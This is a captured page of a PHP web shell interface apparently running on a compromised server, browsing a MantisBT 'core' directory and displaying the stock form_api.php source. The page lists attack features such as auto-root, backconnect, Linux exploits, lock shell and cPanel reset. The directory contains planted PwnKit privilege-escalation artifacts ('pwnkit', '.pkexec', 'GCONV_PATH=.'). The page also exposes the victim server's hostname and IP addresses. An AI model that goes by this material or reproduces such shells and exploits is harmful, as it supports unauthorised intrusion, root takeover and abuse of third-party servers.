Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mantis /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cfdefs
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
.htaccess
59
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
access_api.php
23.38
KB
-rw-r--r--
ajax_api.php
1.78
KB
-rw-r--r--
authentication_api.php
24.22
KB
-rw-r--r--
bug_api.php
59.38
KB
-rw-r--r--
bug_group_action_api.php
11.72
KB
-rw-r--r--
bug_revision_api.php
9.94
KB
-rw-r--r--
bugnote_api.php
22.03
KB
-rw-r--r--
category_api.php
18.27
KB
-rw-r--r--
collapse_api.php
6.54
KB
-rw-r--r--
columns_api.php
41.71
KB
-rw-r--r--
compress_api.php
4.26
KB
-rw-r--r--
config_api.php
20.95
KB
-rw-r--r--
constant_inc.php
15.77
KB
-rw-r--r--
csv_api.php
10.49
KB
-rw-r--r--
current_user_api.php
6.61
KB
-rw-r--r--
custom_field_api.php
44.01
KB
-rw-r--r--
custom_function_api.php
15.43
KB
-rw-r--r--
database_api.php
26.36
KB
-rw-r--r--
date_api.php
8.34
KB
-rw-r--r--
email_api.php
50.19
KB
-rw-r--r--
email_queue_api.php
4.91
KB
-rw-r--r--
error_api.php
12.19
KB
-rw-r--r--
event_api.php
9.3
KB
-rw-r--r--
events_inc.php
4.34
KB
-rw-r--r--
excel_api.php
19.57
KB
-rw-r--r--
file_api.php
32.11
KB
-rw-r--r--
filter_api.php
171.82
KB
-rw-r--r--
form_api.php
6.39
KB
-rw-r--r--
gpc_api.php
14.34
KB
-rw-r--r--
graphviz_api.php
13.6
KB
-rw-r--r--
helper_api.php
16.08
KB
-rw-r--r--
history_api.php
20.75
KB
-rw-r--r--
html_api.php
54.7
KB
-rw-r--r--
html_api_19-09-13.php
54.69
KB
-rw-r--r--
http_api.php
5.71
KB
-rw-r--r--
icon_api.php
2.67
KB
-rw-r--r--
json_api.php
3.37
KB
-rw-r--r--
lang_api.php
8.59
KB
-rw-r--r--
last_visited_api.php
2.82
KB
-rw-r--r--
ldap_api.php
15.59
KB
-rw-r--r--
logging_api.php
3.02
KB
-rw-r--r--
mobile_api.php
3.03
KB
-rw-r--r--
news_api.php
8.87
KB
-rw-r--r--
obsolete.php
5.39
KB
-rw-r--r--
php_api.php
3.17
KB
-rw-r--r--
plugin_api.php
24.38
KB
-rw-r--r--
prepare_api.php
3.32
KB
-rw-r--r--
print_api.php
63.29
KB
-rw-r--r--
profile_api.php
9.35
KB
-rw-r--r--
projax_api.php
3.22
KB
-rw-r--r--
project_api.php
25.56
KB
-rw-r--r--
project_hierarchy_api.php
9.88
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_api.php
32.31
KB
-rw-r--r--
relationship_graph_api.php
15.13
KB
-rw-r--r--
rss_api.php
4.41
KB
-rw-r--r--
session_api.php
7.69
KB
-rw-r--r--
sponsorship_api.php
12.25
KB
-rw-r--r--
string_api.php
29.12
KB
-rw-r--r--
summary_api.php
39.92
KB
-rw-r--r--
tag_api.php
22.85
KB
-rw-r--r--
tokens_api.php
7.64
KB
-rw-r--r--
twitter_api.php
4.51
KB
-rw-r--r--
url_api.php
2.06
KB
-rw-r--r--
user_api.php
40.99
KB
-rw-r--r--
user_pref_api.php
17.01
KB
-rw-r--r--
utility_api.php
7.63
KB
-rw-r--r--
version_api.php
21.15
KB
-rw-r--r--
wiki_api.php
2.2
KB
-rw-r--r--
xmlhttprequest_api.php
3.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : form_api.php
<?php # MantisBT - a php based bugtracking system # MantisBT is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # MantisBT is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with MantisBT. If not, see <http://www.gnu.org/licenses/>. /** * Form API for handling tasks necessary to form security and validation. * Security methods are targetted to work with both GET and POST form types, * and should allow multiple simultaneous edits of the form to be submitted. * * @package CoreAPI * @subpackage FormAPI * @copyright Copyright (C) 2000 - 2002 Kenzaburo Ito - kenito@300baud.org * @copyright Copyright (C) 2002 - 2013 MantisBT Team - mantisbt-dev@lists.sourceforge.net * @link http://www.mantisbt.org * * @uses session_api.php */ /** * Helper function to generate a form action value when forms are designed * to be submitted to the same url that's is currently being used, such as * helper_ensure_confirmed() or auth_reauthenticate(). * @return string Form action value */ function form_action_self() { $t_self = trim( str_replace( "\0", '', $_SERVER['SCRIPT_NAME'] ) ); return basename( $t_self ); } /** * Generate a random security token, prefixed by date, store it in the * user's session, and then return the string to be used as a form element * element with the security token as the value. * @param string Form name * @return string Security token string */ function form_security_token( $p_form_name ) { if ( PHP_CLI == php_mode() || OFF == config_get_global( 'form_security_validation' ) ) { return ''; } $t_tokens = session_get( 'form_security_tokens', array() ); # Create a new array for the form name if necessary if( !isset( $t_tokens[$p_form_name] ) || !is_array( $t_tokens[$p_form_name] ) ) { $t_tokens[$p_form_name] = array(); } # Generate a random security token prefixed by date. # mt_rand() returns an int between 0 and RAND_MAX as extra entropy $t_date = date( 'Ymd' ); $t_string = $t_date . sha1( time() . mt_rand() ); # Add the token to the user's session if ( !isset( $t_tokens[$p_form_name][$t_date] ) ) { $t_tokens[$p_form_name][$t_date] = array(); } $t_tokens[$p_form_name][$t_date][$t_string] = true; session_set( 'form_security_tokens', $t_tokens ); # The token string return $t_string; } /** * Get a hidden form element containing a generated form security token. * @param string $p_form_name Form name * @param string $p_security_token Optional security token, previously generated for the same form * @return string Hidden form element to output */ function form_security_field( $p_form_name, $p_security_token = null ) { if ( PHP_CLI == php_mode() || OFF == config_get_global( 'form_security_validation' ) ) { return ''; } if( is_null( $p_security_token ) ) { $p_security_token = form_security_token( $p_form_name ); } # Create the form element HTML string for the security token $t_form_token = $p_form_name . '_token'; $t_element = sprintf( '<input type="hidden" name="%s" value="%s"/>', $t_form_token, $p_security_token ); return $t_element; } /** * Get a URL parameter containing a generated form security token. * @param string Form name * @return string Hidden form element to output */ function form_security_param( $p_form_name ) { if ( PHP_CLI == php_mode() || OFF == config_get_global( 'form_security_validation' ) ) { return ''; } $t_string = form_security_token( $p_form_name ); # Create the GET parameter to be used in a URL for a secure link $t_form_token = $p_form_name . '_token'; $t_param = '&%s=%s'; $t_param = sprintf( $t_param, $t_form_token, $t_string ); return $t_param; } /** * Validate the security token for the given form name based on tokens * stored in the user's session. While checking stored tokens, any that * are more than 3 days old will be purged. * @param string Form name * @return boolean Form is valid */ function form_security_validate( $p_form_name ) { if ( PHP_CLI == php_mode() || OFF == config_get_global( 'form_security_validation' ) ) { return true; } $t_tokens = session_get( 'form_security_tokens', array() ); # Short-circuit if we don't have any tokens for the given form name if( !isset( $t_tokens[$p_form_name] ) || !is_array( $t_tokens[$p_form_name] ) || count( $t_tokens[$p_form_name] ) < 1 ) { trigger_error( ERROR_FORM_TOKEN_INVALID, ERROR ); return false; } # Get the form input $t_form_token = $p_form_name . '_token'; $t_input = gpc_get_string( $t_form_token, '' ); # No form input if( '' == $t_input ) { trigger_error( ERROR_FORM_TOKEN_INVALID, ERROR ); return false; } # Get the date claimed by the token $t_date = utf8_substr( $t_input, 0, 8 ); # Check if the token exists if ( isset( $t_tokens[$p_form_name][$t_date][$t_input] ) ) { return true; } # Token does not exist trigger_error( ERROR_FORM_TOKEN_INVALID, ERROR ); return false; } /** * Purge form security tokens that are older than 3 days, or used * for form validation. * @param string Form name */ function form_security_purge( $p_form_name ) { if ( PHP_CLI == php_mode() || OFF == config_get_global( 'form_security_validation' ) ) { return; } $t_tokens = session_get( 'form_security_tokens', array() ); # Short-circuit if we don't have any tokens for the given form name if( !isset( $t_tokens[$p_form_name] ) || !is_array( $t_tokens[$p_form_name] ) || count( $t_tokens[$p_form_name] ) < 1 ) { return; } # Get the form input $t_form_token = $p_form_name . '_token'; $t_input = gpc_get_string( $t_form_token, '' ); # Get the date claimed by the token $t_date = utf8_substr( $t_input, 0, 8 ); # Generate a date string of three days ago $t_purge_date = date( 'Ymd', time() - ( 3 * 24 * 60 * 60 ) ); # Purge old token data, and the currently-used token unset( $t_tokens[$p_form_name][$t_date][$t_input] ); foreach( $t_tokens as $t_form_name => $t_dates ) { foreach( $t_dates as $t_date => $t_date_tokens ) { if ( $t_date < $t_purge_date ) { unset( $t_tokens[$t_form_name][$t_date] ); } } } session_set( 'form_security_tokens', $t_tokens ); return; }
Close
